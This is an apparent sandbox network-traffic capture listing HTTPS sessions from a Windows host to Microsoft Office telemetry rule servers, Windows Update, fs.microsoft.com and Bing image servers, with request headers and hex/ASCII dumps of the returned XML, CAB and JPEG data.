encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:27 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:28 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060928Z-174c587ffdfcj798hC1TEB9bq400000002t0000000001fw6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:28 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.6	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:27 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:28 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: df770720-601e-0002-4a47-3ca786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060928Z-178bfbc474b9fdhphC1NYCac0n00000003y000000000chn5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:28 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49769	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:28 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UwR+YbHaZNrmG2l&MD=KeOoTvEV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-23 06:09:28 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: d8c31ad0-fe06-4533-93ae-9818a160e7c1 MS-RequestId: 4d9f1424-ba1f-41cf-8c13-ceb744b2e750 MS-CV: +PffbH/7FEOiuR/x.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 23 Nov 2024 06:09:28 GMT Connection: close Content-Length: 24490
2024-11-23 06:09:28 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-23 06:09:28 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49772	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:28 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-23 06:09:28 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF57) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=38118 Date: Sat, 23 Nov 2024 06:09:28 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49774	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:28 UTC	375	OUT	GET /th?id=OADD2.10239317301209_1YG8XJG78E6WL3S49&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:29 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 761871 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: F8752C9D44F0421FABE2EEB580C535E9 Ref B: EWR30EDGE1009 Ref C: 2024-11-23T06:09:29Z Date: Sat, 23 Nov 2024 06:09:28 GMT Connection: close
2024-11-23 06:09:29 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1d 1c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 30 38 3a 30 34 20 31 36 3a 31 31 3a 31 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 23.4 (Windows)2022:08:04 16:11:158
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: 19 b6 9b b6 a6 e6 93 65 1c c1 62 2a 36 d5 8d b1 d1 1a d1 cc 16 21 a3 6d 5a 8f c8 ff 00 9e 35 34 72 c0 9f f2 c6 a5 ce c5 a8 2e e6 7e da 7e d9 2a ff 00 db 23 ff 00 9e 34 e8 ef bf e9 8d 4f b4 6b a1 5e ce 1f cc 51 8e 09 df ee 43 52 fd 86 ef fe 78 d5 c8 f5 0a 9e 0d 42 3f e3 a8 94 ea 5b 63 48 d2 a4 de e6 74 1a 55 fc bf f2 c7 cb ff 00 ae b4 49 a5 5f a7 fc b1 ad 9f ed 58 3f e7 b5 3b fb 42 0f f9 ed 59 fb 6a df ca 8d be af 43 f9 bf 13 1f fb 1e ff 00 fe 78 d3 a3 d0 ef df fe 78 d6 b7 f6 9d bf fc f6 a9 a0 d5 60 fb 9e 75 4f b5 ad d9 15 1c 36 1d ef 2f c4 c5 fe c1 bf ff 00 a6 34 7f 62 dd fa d6 e7 db ad ff 00 e7 b5 37 fb 42 0f f9 ed 4b eb 15 bb 22 be ab 87 ef f8 98 32 69 57 eb ff 00 2c 6a 1f b1 5d ff 00 cf 19 ab a1 fe d2 83 fe 7b 54 13 ea 71 d6 9e da ab e8 65 2a 18 74 be Data Ascii: eb6!mZ54r.~~#4Ok^QCRxB?[cHtUI_X?;BYjCxx`uO6/4b7BK"2iW,j]{Tqe*t
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: fe 8d f7 d2 37 5f e1 56 fe 75 e7 b7 5a f4 92 dd ff 00 68 df 79 da 8d d5 c7 ee ff 00 7b fe cf fc f2 5f f7 ab 9a 96 12 be 25 f3 4d fb be 46 b5 31 14 e8 be 58 ee 76 5a ae af f6 d8 63 b2 82 18 7c cb 89 53 cb b6 f9 df f8 ff 00 0d db 7f b9 56 23 d4 df 4f f3 34 e7 9a ee 39 e3 91 e4 92 4f f6 3f be db 7e e6 ef 4a f3 ef ed e9 34 fd 5a 44 ba 9a 1b 8d 73 cc 4f 2e 4b 1d ef f6 7d bf ed ff 00 07 fc 06 a0 b4 f3 35 09 b6 5e cd e5 da db c8 fe 64 7f 73 cc ff 00 3f ed 57 a0 b2 fd 35 f8 4e 3f ae 36 ff 00 bc 75 1f da f1 cb a7 c9 06 97 79 34 90 5e ff 00 d3 27 7f e3 fb df ef ff 00 77 f3 aa b3 49 ab 3d d4 97 5f 6c fd fd cf fa bb 99 66 df 6d 61 12 ff 00 77 fb f2 7f b5 58 be 20 d5 e0 4f 0f 7f a2 cd 0f 97 26 c8 e3 b6 f2 bf d5 ff 00 df 35 47 c4 da bc f6 fa 7c 6f fe af cc d9 1d cf f1 Data Ascii: 7_VuZhy{_%MF1XvZc\|SV#O49O?~J4ZDsO.K}5^ds?W5N?6uy4^'wI=_lfmawX O&5G\|o
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: cb 4b e6 d2 b5 c2 f6 34 fe d3 b2 88 2f 37 d6 4f 9b 23 d1 1b 51 c8 83 9d 9b 9f 6a a7 47 77 58 c8 d5 2f 99 53 ec d1 4a a3 35 3e d3 be 8f 3e b3 77 7b d3 fc da 5c 88 7c ec bf e7 d1 e7 c9 54 3c da 24 9e 8e 42 79 99 7f cc a6 f9 f5 9b 24 f5 2c 32 53 e5 17 33 65 af 37 7d 3f 6c 9f c1 50 c7 2c 74 ff 00 b4 ff 00 9c 52 77 63 56 1f e5 49 fc 73 52 79 54 d8 e5 df 4f dd 42 93 27 95 76 27 8d b6 54 be 65 52 f3 69 7c fa 45 a9 17 3c f9 29 9e 6d 53 f3 e9 fe 7d 2b 0f 9c d1 82 7d 95 2c 77 35 93 e7 d1 e7 d2 e5 45 73 b3 7a 39 ea 78 27 ae 7a 3b 9a b1 1d f5 66 e9 be 88 d6 35 53 3a 08 e7 a6 c9 3d 73 f2 6a 72 7f 05 33 fb 42 47 a5 ec 4a 75 a2 ce 86 4b 9a 77 9f 5c ff 00 db 24 f5 a3 ed d2 37 c9 42 a5 61 7b 64 6d c9 73 50 49 79 59 7e 7d 43 24 f4 d5 34 88 75 19 a5 25 cd 57 92 e6 a8 c9 3d Data Ascii: K4/7O#QjGwX/SJ5>>w{\\|T<$By$,2S3e7}?lP,tRwcVIsRyTOB'v'TeRi\|E<)mS}+},w5Esz9x'z;f5S:=sjr3BGJuKw\$7Ba{dmsPIyY~}C$4u%W=
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: fe b3 ca f9 2d ff 00 cf ad 71 fe 2a f1 fe 8b ff 00 1e ba 0f 89 26 bd d5 63 91 fc c9 22 8b 67 97 e5 fc 8d e5 ee fb ed ba b9 e8 51 a9 56 49 52 5a ee d9 75 1d 3a 50 f7 9d 8c 7f 8b 1e 31 d2 7c 4b 0d 8c 1a 5d e4 d2 41 6f 64 ff 00 e8 5e 56 fb 69 1e 2f 91 77 ff 00 77 fb 95 e6 d2 6b da b6 ab a4 d8 ea 3a a6 8f 34 72 59 47 f6 b9 24 f2 92 6b cb 7f fa e7 fe cf f7 6b 53 51 be 81 21 fb 17 9d 37 9f 1c 89 e5 c7 15 a6 f7 df 27 df 5f f0 ad bf 08 f8 32 c3 58 bb fe de b5 b3 ff 00 84 77 ec 56 d3 5a 49 f6 98 bf 7d 24 5f f2 cb c9 85 bf 87 fd a7 fe 2a fa ca 71 a3 84 a2 ae b4 5d f5 3e 7e a7 b4 c4 54 f7 5e bd b6 2e f8 3a e7 56 bb d7 23 d7 b5 7b 3b bb db eb 88 ff 00 e5 e7 fe 3d ad fc c4 db 12 24 4b f2 a4 a7 f8 9a ad 69 57 37 f7 1f 10 b4 dd 5e 78 7f 79 f6 6b 9f f5 51 27 93 69 e4 3f Data Ascii: -q&c"gQVIRZu:P1\|K]Aod^Vi/wwk:4rYG$kkSQ!7'_2XwVZI}$_q]>~T^.:V#{;=$KiW7^xykQ'i?
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: e4 fe 2a 82 3f 0f eb 91 de e8 37 93 5c 68 72 7e f3 4d b9 8f fb 9f f3 cd bf da ff 00 7a be 8e d2 b5 ef 0b f8 db f6 77 b9 d1 2d 7c 49 0d ee bf a4 db 27 d9 be dd 2f 92 ff 00 ba fb af fe d7 cb 5e 23 e2 ef 04 fd a3 c0 7f db da 0f ee e0 b7 8f fe 27 56 56 df f2 e9 7a 8f ff 00 3c bf f1 f0 7f bb 5e 66 55 8a 9c 5f 26 23 e2 5e eb df de 5d 1f af 9f 53 d0 cc 30 f0 6a f4 35 8f c4 ad d3 ba 5d d1 6a 4d 56 3d 42 ee 3b d7 87 ec 52 79 49 77 ab 5b 79 bf 25 df fd 3c 26 d6 f9 d9 1b b5 74 37 5f 15 f5 df 02 78 b2 c7 fb 2e f2 ef 5e f0 e7 96 92 7d 8a e6 54 86 68 e5 5f f5 bb 36 fd c5 af 20 9e fa d2 e2 6b 6b d8 34 7d 3e de 3f b3 7d 9e 4b 68 b7 ec df f7 5a 4f f6 59 fe f5 7a 5f 87 e7 b0 f1 87 87 bc 87 d0 6e fc fb 7b 24 fb 6c 76 d2 a6 cb b7 df b1 1b 7e ef dd ee ef ba bd 2c 4e 12 93 87 Data Ascii: *?7\hr~Mzw-\|I'/^#'VVz<^fU_&#^]S0j5]jMV=B;RyIw[y%<&t7_x.^}Th_6 kk4}>?}KhZOYz_n{$lv~,N
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: 73 5b c7 e6 fc 89 23 db 3f 99 1e ff 00 f7 fe 74 ae fa 15 a2 a9 59 f7 fc ce 4a d1 6e ad d0 6a 53 fd 92 6b 17 fd f7 d9 63 b2 4b bf f5 5f c7 fe c5 52 be 96 7b 7d 5a db 4e 79 bc c9 e4 f3 ae ee 7f 75 fc 6c 9f 2f fe 3b 5a fa 6d b6 9b 77 a2 5b 6a 3f 6c fb 44 16 51 a7 99 1c 5f 7f cd de 7c a8 3f f8 aa 87 4e d0 ff 00 b4 fc 6f be d6 68 6e 27 8e d9 2e 24 8e e6 5d 9f 3b 7d ef fc 76 94 67 05 7b f4 2a 5c cd a4 ba d8 a3 6a d7 76 fe 0d b6 81 3f d6 5e fe ef fe ba 7f 13 d6 a6 9b 73 71 2c 3e 4b cd 37 91 1c 69 ff 00 6c ea d7 88 34 8b 47 f1 66 cb 2f 3a 4f b3 c6 f1 c7 1c b3 7f ac 7f e2 da b5 6a e3 45 b4 b7 86 48 1f 52 ff 00 57 fb cb d9 22 97 e4 f3 7f b9 f8 56 72 a9 09 6f d7 53 44 9a 56 ed a1 97 6b 2e ff 00 32 eb f7 d1 ff 00 cf 39 3c aa 64 ed 24 56 9f 3c de 5c 9f eb 3f 7b 17 fa Data Ascii: s[#?tYJnjSkcK_R{}ZNyul/;Zmw[j?lDQ_\|?Nohn'.$];}vg{*\jv?^sq,>K7il4Gf/:OjEHRW"VroSDVk.29<d$V<\?{
2024-11-23 06:09:29 UTC	16065	IN	Data Raw: ef dc 49 fb a4 4f ba 9f 25 62 e9 3b aa 71 8d fb 9a a9 68 e4 cd 7d 37 c5 f3 a6 93 6d 7a 90 f9 77 52 49 f6 7f de fd cb 7d b5 56 7d 42 ef 55 bb d3 61 bd bc 9a 3b 5b 7f de 5c c9 e5 6f f3 2a f6 95 7d 69 2f 84 ed a0 ba 87 cb 93 fe b9 6f fd eb 7d f6 a9 ae ad b4 2b b8 be c3 fd b1 37 9f e5 fe ee 49 7f 72 95 cd 1e 55 37 68 f5 f5 34 94 9a 4a fa 9a 91 d9 c7 77 0f d8 ac bc 9f 33 fe 59 c9 73 b2 67 db fd e5 ae 2b c7 16 77 7e 1a d7 23 b5 fe d8 96 48 2e 23 f3 3f d6 bf f0 fd ef e2 ae b7 47 b3 b4 d1 e1 f2 1e 68 7c cf f5 92 5c dc ff 00 cb 4a f1 df 8e ed 61 69 e3 cf 0d ea 33 ea 5f 68 b5 b9 93 cb bd f2 b7 fe ef fd ba df 2f a4 ea 62 7d 9f d9 b3 39 f1 55 39 29 73 bd cf 44 f0 e5 9c 77 be 65 af db 21 8e 3f 2d 2e 23 f3 65 ff 00 59 ba b3 7c 69 e1 e8 35 b8 75 6f 0e dd 5e 43 24 12 46 Data Ascii: IO%b;qh}7mzwRI}V}BUa;[\o*}i/o}+7IrU7h4Jw3Ysg+w~#H.#?Gh\|\Jai3_h/b}9U9)sDwe!?-.#eY\|i5uo^C$F
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: b2 27 5f f8 15 63 69 ba e5 df c2 df da 7f c4 90 4f 34 d1 e9 57 17 af 1d cf 97 2f fa bb 79 3f 7a 8e bf ee 56 4f ed 27 e0 c9 fc 29 e3 28 fc 57 a7 4d 0d c6 8f e2 69 1e e2 3f 2b ee 5b ca df bc 65 ff 00 75 be f8 ae 9c 3e 16 35 2b f2 e2 5d fd a2 52 84 92 b5 9e ed 75 d7 f3 39 ab 62 25 4e 97 3d 0d 14 1d a4 bc ba 3f eb b9 cc f8 3b 50 d4 bc 19 e2 6b 6d 46 d7 fd 7d 94 9f f3 d7 fe 3e 13 ff 00 89 75 af 7d f8 33 67 69 a1 69 3a 96 a2 f6 73 79 16 5a 95 cd bd 94 7e 6f f1 cf e5 cc c9 fe d6 dd b5 f3 35 f4 5b 2d 24 99 ff 00 d6 47 fb cf f8 05 7b 9c 96 97 70 f8 c7 e1 e7 80 13 52 f3 2e ac b4 db 6b cd 4a 3f 37 fd 64 b3 fc ec ab fe df 97 5d b9 cd 28 ce 0a 3d ef 7f 48 ab ff 00 5e a7 36 57 53 92 52 7e 96 f5 6e c7 2b fb 5b 78 72 3d 0b e2 6c 77 bf 63 9a 38 f5 eb 24 b8 b9 fd ee ff 00 Data Ascii: '_ciO4W/y?zVO')(WMi?+[eu>5+]Ru9b%N=?;PkmF}>u}3gii:syZ~o5[-$G{pR.kJ?7d](=H^6WSR~n+[xr=lwc8$
2024-11-23 06:09:29 UTC	16384	IN	Data Raw: 3d 37 c4 be 03 d6 de f7 f7 77 da 75 eb c9 65 7b e5 7c ff 00 de db fe e1 ad a9 d5 ab 85 6a 8d 79 39 41 da cf ae bd 9f e8 65 52 8d 3c 4a f6 d4 12 8c d6 eb d3 74 d1 e6 be 38 f0 f4 9a 25 e4 8f 65 79 fd ab a1 f9 9f e8 da 95 b7 ce 9f de da ff 00 dd 6a cf d2 96 d2 ee ee 3b 5b ad 4b ec 50 5c 7f ac b9 97 7b a4 75 a5 24 fe 28 f0 3c d2 e9 d3 ff 00 a3 c7 7b b2 e2 38 e5 f9 ed ae ff 00 ba d5 ad e3 8d 0f 42 d4 3c 3d 6d e2 5f 08 c3 34 70 79 7f e9 b6 df f3 c1 ff 00 f6 5a f5 63 5d c5 46 32 77 4f 69 7f 9f a9 e6 ca 8a 93 94 a1 a3 5b c7 fc bd 0c 7f 17 78 72 ff 00 44 8a db fb 46 68 64 f3 23 f3 2d a4 b6 f9 fe 5a 3c 1c b7 f2 f8 82 da 0b 29 a6 b7 ba 92 4f b3 c7 7b 17 fb 5f e7 ee d5 2b 59 ee e5 b4 fb 2f 9d 34 90 79 9f bb 8f ef ff 00 df 35 da f8 57 c0 b7 f7 7a 1f f6 8d 95 e5 dd 95 Data Ascii: =7wue{\|jy9AeR<Jt8%eyj;[KP\{u$(<{8B<=m_4pyZc]F2wOi[xrDFhd#-Z<)O{_+Y/4y5Wz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49775	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:29 UTC	346	OUT	GET /th?id=OADD2.10239317301618_18EK60OU3ULIWMD9V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:29 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 910935 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 5F1CB3F491014A989607D2068A175B5A Ref B: EWR311000106019 Ref C: 2024-11-23T06:09:29Z Date: Sat, 23 Nov 2024 06:09:28 GMT Connection: close
2024-11-23 06:09:29 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 07 80 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIFCC8"}!1AQa"q2
